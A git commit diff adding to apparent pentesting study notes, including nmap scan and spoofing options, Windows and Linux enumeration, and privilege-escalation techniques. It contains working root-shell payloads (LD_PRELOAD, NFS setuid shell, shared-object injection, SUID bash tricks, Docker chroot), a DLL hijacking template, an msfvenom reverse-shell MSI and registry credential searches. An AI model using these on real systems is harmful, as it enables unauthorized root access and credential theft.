This commit is contained in:
Stefan Friese 2021-10-23 02:03:06 +02:00
parent b35bcc5560
commit 016773b802
27 changed files with 4487 additions and 8 deletions

9
.gitmodules vendored
View File

@ -40,3 +40,12 @@
[submodule "enumeration/RustScan"] [submodule "enumeration/RustScan"]
path = enumeration/RustScan path = enumeration/RustScan
url = https://github.com/RustScan/RustScan.git url = https://github.com/RustScan/RustScan.git
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
url = https://github.com/mzet-/linux-exploit-suggester
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration"]
path = post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration
url = https://github.com/diego-treitos/linux-smart-enumeration
[submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"]
path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker
url = https://github.com/linted/linuxprivchecker

View File

@ -1,6 +1,20 @@
# nmap # nmap
# Usage ## Scan Types
* ARP
* ICMP
* TCP
* UDP
## Port States
1. Open
2. Closed
3. Filtered
4. Unfiltered
5. Open|Filtered
6. Close|Filtered
## Usage
```sh ```sh
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP> nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
@ -9,13 +23,105 @@ nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP> nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
``` ```
## combo with searchsploit ### combo with searchsploit
* nmap-full scan * nmap-full scan
```sh ```sh
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP> sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
searchsploit --nmap ./nmap-full.xml --verbose searchsploit --nmap ./nmap-full.xml --verbose
``` ```
## Wordpress Enumeration ### Wordpress Enumeration
```sh ```sh
nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com
``` ```
### Use List of Hosts
```sh
nmap -iL <ListofHosts>
```
* Show hosts, dns resolution included
```sh
nmap -sL -n 10.10.0.0/16
```
### ARP Scan Local Network
```sh
nmap -PR -sn 192.168.0.0/24
```
### ICMP Scans
* __Type 8__ (Ping Request)
```sh
nmap -PE -sn 10.10.0.0/16
```
* __Type 13__ (Timestamp Request)
```sh
nmap -PP -sn 10.10.0.0/16
```
* __Type 17__ (Address Mask Queries)
```sh
nmap -PM -sn 10.10.0.0/16
```
### TCP Scans
* `-PS23` Syn on port 23
* `-PA80-8080` ACK on port range 80-8080
#### TCP Scan Types
* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
* __FIN Scan__ `-sF` , same procedure as null scan.
* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
### UDP SCans
* `-PU`
* May be answered by ICMP Type 3 if the port is not reachable
### DNS Scan
* No lookup `-n`
* Reverse lookup for every host `-R`
* Host discovery only `-sn`
### Spoofing
* IP `-S <spoofed-IP>`
* MAC `--spoof-mac <spoofed-MAC>`
* Disable ping scan `-Pn`
* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
### Service Detection
* `-sV`
* `--version-intensity <level 0-9>`
* Intensity 2 `--version-light`
* Intensity 9 `--version-all`
## Scripts
Installed at `/usr/share/nmap/scripts`
* __auth__ Authentication related scripts
* __broadcast__ Discover hosts by sending broadcast messages
* __brute__ Performs brute-force password auditing against logins
* __default__ Default scripts, same as -sC
* __discovery__ Retrieve accessible information, such as database tables and DNS names
* __dos Detects__ servers vulnerable to Denial of Service (DoS)
* __exploit__ Attempts to exploit various vulnerable services
* __external__ Checks using a third-party service, such as Geoplugin and Virustotal
* __fuzzer__ Launch fuzzing attacks
* __intrusive__ Intrusive scripts such as brute-force attacks and exploitation
* __malware__ Scans for backdoors
* __safe__ Safe scripts that wont crash the target
* __version__ Retrieve service versions
* __vuln__ Checks for vulnerabilities or exploit vulnerable services
## Tips & Tricks
* Scan the 100 most interesting ports via `-F`
* `--top-ports 100`
* One probe every 5 minutes via `-T0`
* A closed port responds with `RST/ACK` to a initial `SYN`
* Scan ports iteratively by using `-r`, not random
* Closed Port
* Control packet rate via `--min-rate` and `--max-rate`
* Control parallel probes via `--min-parallelism` and `--max-parallelism`
* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
* `--reason`, `-d`, `-vv`
* `--traceroute`

View File

@ -63,7 +63,7 @@ Get-ChildItem | Sort-Object
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
``` ```
```sh ```sh
Get-HotFix | Format-list | findstr <searchstring> Get-HotFix | Format-list | findstr <searchstring>
``` ```
```sh ```sh
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
@ -160,6 +160,10 @@ Get-WmiObject win32_useraccount | Select name, sid
``` ```
### Network intel ### Network intel
* Connections
```sh
netstat -ano
```
* IP Address * IP Address
``` ```
Get-NetIpAddress Get-NetIpAddress
@ -183,7 +187,14 @@ Get-Hotfix
``` ```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284 Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
``` ```
```sh
wmic qfe get Caption,Description,HotFixID,InstalledOn
```
### Drivers
```sh
driverquery
```
### Processes ### Processes
* Start processes * Start processes
@ -195,6 +206,10 @@ Start-Process <process>
```sh ```sh
Get-Process <process> Get-Process <process>
``` ```
### Scheduled tasks
```sh
schtasks /query /fo LIST /v
```
* Scheduled Tasks, by TaskName * Scheduled Tasks, by TaskName
``` ```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
@ -236,6 +251,15 @@ for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl} 1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
``` ```
### Antivirus
```sh
sc query windefend
```
* Service name unknown
```sh
sc queryex type=service
```
### Using Powerview ### Using Powerview
```sh ```sh
Import-Module .\powerview.ps1 Import-Module .\powerview.ps1

View File

@ -0,0 +1,21 @@
# LD_PRELOAD
* Preload libs and do interpositioning of functions.
## Example
```sh
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
```
* `gcc -fPIC -shared -o lib.so lib.c -nostartfiles`
* `sudo LD_PRELOAD=lib.so apache2`
* `$ id`

View File

@ -0,0 +1,21 @@
# NFS RootSquash
* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)
* `no_root_squash` has to be as an option on the NFS device
## Usage
* `showmount -e <target-IP>`
* `mkdir /tmp/net_volume`
* Connect to NFS share
```sh
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
```
* Create root shell inside the dir of the share
```sh
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell
```

View File

@ -0,0 +1,24 @@
# Shared Object Injection
* [gaffe23](https://github.com/gaffe23/linux-inject)
* [exploit-db](https://www.exploit-db.com/papers/37606)
* Test binary via
```sh
strace <binary> 2>&1 | grep -i -E "open|access|no such file"
```
## Example
```sh
#include <stdio.h>
#include <stdlib.h>
static void inject ( ) __attribute__ ( (constructor) );
void inject ( ) {
system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
}
```
* `gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c`
* Run binary using the lib

View File

@ -0,0 +1,42 @@
# DLL Hijacking
## Search Orders
* __SafeDllSearchMode__ enabled searches paths in following order:
* __cwd__ of executable
* System directory, `GetSystemDirectory`
* 16-bit system directory
* Windows, `GetWindowsDirectory`
* __pwd__
* PATH
* __SafeDllSearchMode__ disabled searches in following order:
* __cwd__ of executable
* __pwd__
* System directory
* 16-bit system directory
* Windows directory
* PATH environment variable
## Template
```C
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
```
* Compilation via
```sh
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
* Upload to target
* Restart dllsvervice via
```sh
sc stop dllsvc
sc start dllsvc
```

View File

@ -0,0 +1,14 @@
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}

Binary file not shown.

View File

@ -11,7 +11,14 @@ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Po
``` ```
* start the msi on target * start the msi on target
```sh ```sh
msiexec /quiet /qn /i C:\shell.msi msiexec /quiet /qn /i C:\Temp\shell.msi
```
## Set Registry Keys
* Alternative method
```sh
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
``` ```

View File

@ -1,7 +1,10 @@
# Unquoted Path # Unquoted Path
* Path to a service without quotes can be hijacked by inserting other executables and services into the path. * Path to a service without quotes can be hijacked by inserting other executables and services into the path.
* Some part of path has to be writeable. * Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
## Example ## Example
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe` * The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
```sh ```sh

View File

@ -50,10 +50,18 @@ find / -name "*sock"
groups groups
``` ```
* Mount the host volume and chroot to it, need alpine image * Mount the host volume and chroot to it, need alpine image.
```sh
docker images
```sh
```sh ```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh docker run -v /:/mnt --rm -it alpine chroot /mnt sh
``` ```
or
```sh
docker run -v /:/host --rm -it <imageID> chroot /host/ bash
```
## Shared Namespaces ## Shared Namespaces
* Namespaces * Namespaces

View File

@ -0,0 +1,37 @@
# Linux enumeration
* `cat /etc/*-release` * `cat /proc/version`
* `hostname`
* `uname -a`
* `cat /etc/issue`
* `ps wuax ` or `ps ajxf` or `ps -A`
* `printenv` or `env`
* `sudo -l`
* `id`
* `whoami`
* `groups` and `getent group`
* `cat /etc/passwd`
* `history`
* `ip` or `ifconfig`
* `ip route`
* `netstat -natup` or `ss natup`
* `netstat -s` and `netstat -i`
* `lsof -i`
* Find SUID permissions on files and dirs
* `find / -perm /6000 -ls 2>/dev/null`
* Find writeables dirs
* `find / -writable -type d 2>/dev/null` or `find / -perm -o w -type d 2>/dev/null`
* `find / -perm -o x -type d 2>/dev/null`
* Find writeable subdirs
`find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u`

View File

@ -0,0 +1,6 @@
# Man In the Middle
* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)

View File

@ -5,4 +5,72 @@
* [LinEnum](https://github.com/rebootuser/LinEnum) * [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh) * [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester) * [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/) * [GTFObins](https://gtfobins.github.io/)
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
## Kernel Exploits
### Dirty COW
* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)
## Stored Keys & Passwords
* History
* Environment Variables
* Config + Dot Files
* SSH keys
```sh
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
```
## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
* SUID
* list
```sh
find / -perm /6000 -ls 2>dev/null
```
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l`
* Take a look at GTFObins
* Keep an eye on the displayed host and env capabilities
## PATH Hijacking
* Interpositioning binaries via PATH
* Look for binaries used in other bins and scripts
* Interposition name and add the directory in front of `$PATH`
## Bash function
* Interpositioning of binaries via bash functions
```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
```sh
export -f /path/to/binary
```
* Call binary which invokes this function
## Environment Variable
```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
```
## Capabilities
* [capabilities](../../../exploit/linux/capabilities.md)
## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order
## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)

View File

@ -4,3 +4,74 @@
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html) * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp) * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS) * [JAWS](https://github.com/411Hall/JAWS)
## Account Types
* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__
## Enumeration
### Users & Groups
```sh
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
```
### Files
* [powershell](../../../../enumeration/windows/powershell.md)
### System
```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
```sh
wmic product get name,version,vendor
```
* Services
```sh
wmic service list brief | findstr "Running"
```
## Exploit
### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)
### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)
### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
* Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)
### Schedules Tasks
* `schtasks`
* `Autoruns64.exe`
### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)
### Search for Credentials
```sh
cmdkey /list
```
* Use found credentials
```sh
runas /savecred /user:<user> reverse_shell.exe
```
* Keys containing passwords
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

Binary file not shown.

File diff suppressed because one or more lines are too long

Binary file not shown.

@ -0,0 +1 @@
Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470

@ -0,0 +1 @@
Subproject commit 950268573fbb4389fc4cf56b8d75bfb826564e1d

@ -0,0 +1 @@
Subproject commit ebf996195c767a9f2008a6ba97abefd2e558de82

View File

@ -19,6 +19,11 @@ php -e 'exec "/bin/bash";'
python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/bash")'
``` ```
### Perl
```perl
perl -e 'exec "/bin/sh";'
```
## Next ## Next
1. `ctrl` + `z` 1. `ctrl` + `z`
2. `stty echo -raw` 2. `stty echo -raw`